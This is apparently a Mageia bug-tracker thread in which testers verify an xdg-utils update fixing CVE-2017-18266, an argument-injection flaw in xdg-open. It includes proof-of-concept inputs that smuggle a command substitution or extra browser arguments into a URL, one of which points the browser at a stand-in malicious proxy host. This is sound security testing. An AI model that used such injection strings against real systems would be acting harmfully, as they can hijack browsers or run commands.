Bug 23132

Note that they followed up with a regression fix on May 30:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7OOOVBRZM3RYFISCO5UONJIXTBMKONYF/

Pushed xdg-utils-1.1.3-1 to mga6 core/updates_testing.

Assignee: bugsquad => qa-bugs

Advisory:
========================

Updated xdg-utils package fixes security vulnerability:

The open_envvar function in xdg-open in xdg-utils before 1.1.3 does not validate
strings before launching the program specified by the BROWSER environment
variable, which might allow remote attackers to conduct argument-injection
attacks via a crafted URL, as demonstrated by %s in this environment variable
(CVE-2017-18266).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18266
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZECHRCR6RWTX46ANDPIAXPMHZ2EOHNJB/
========================

Updated packages in core/updates_testing:
========================
xdg-utils-1.1.3-1.mga6

from xdg-utils-1.1.3-1.mga6.src.rpm

MGA6-32 on IBM Thinkpad R50e MATE
No installation issues.
Ref to bug 14932 Comment 16
Giving this command at CLI 
$ xdg-open 'http://127.0.0.1/$(xterm)'
results in a new tabblad in Firefox with "error 404"
but
$ xdg-open 'http://127.0.0.1/$%(xterm)'
as in the same comment results in error 400
I let people with more understanding judge this issue.

CC: (none) => herman.viaene

CVE-2017-18266
https://bugs.freedesktop.org/show_bug.cgi?id=103807

$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --incognito"
This shows a yellow page with a report of an XML error.
'http://www.example.com/%20--incognito' in the address bar.
Not possible to say whether this page is being opened at the given URL or locally.
$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.com/proxy.pac"
Similar response.

Clean update.
The behaviour is the same for the first example above, so, in agreement with Herman I shall leave the interpretation to others.  The older PoC gave the same results as in comment 4.

Utilities available: man or --help for more information.
* xdg-desktop-icon Install icons to the desktop
* xdg-desktop-menu Install desktop menu items
* xdg-email Send mail using the user's preferred e-mail composer
* xdg-icon-resource Install icon resources
* xdg-mime Query information about file type handling and install descriptions for new file types
* xdg-open Open a file or URL in the user's preferred application
* xdg-screensaver Control the screensaver
* xdg-settings Get various settings from the desktop environment

$ xdg-email --cc tarazed25@gmail.com --subject "xdg-utils testing" --body "Can you hear me Muther
> I say, can you hear me Muther?" <...@....>.com

This popped up a mail composer window in thunderbird with the specified fields filled in, message ready to be sent.

Fiddled with the desktop and icon install stuff but got nowhere with those.

$ xdg-open http://exoplanet.eu
No problem with that.

$ xdg-settings get default-web-browser
userapp-Firefox-2P2D6X.desktop

Installed iceape but did no configuration.
$ BROWSER=/usr/bin/iceape xdg-open http://exoplanet.eu
The site came up OK in iceape but there were backend errors reported and entreaties to run mozplugger-update.  Ignored those.

This package obviously requires more background knowledge for effective operation but on the face of it seems to be working.

CC: (none) => tarazed25

Advisoried. Validating.

Keywords: (none) => advisory, has_procedure, validated_update
CC: (none) => sysadmin-bugs

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0289.html

Resolution: (none) => FIXED
Status: NEW => RESOLVED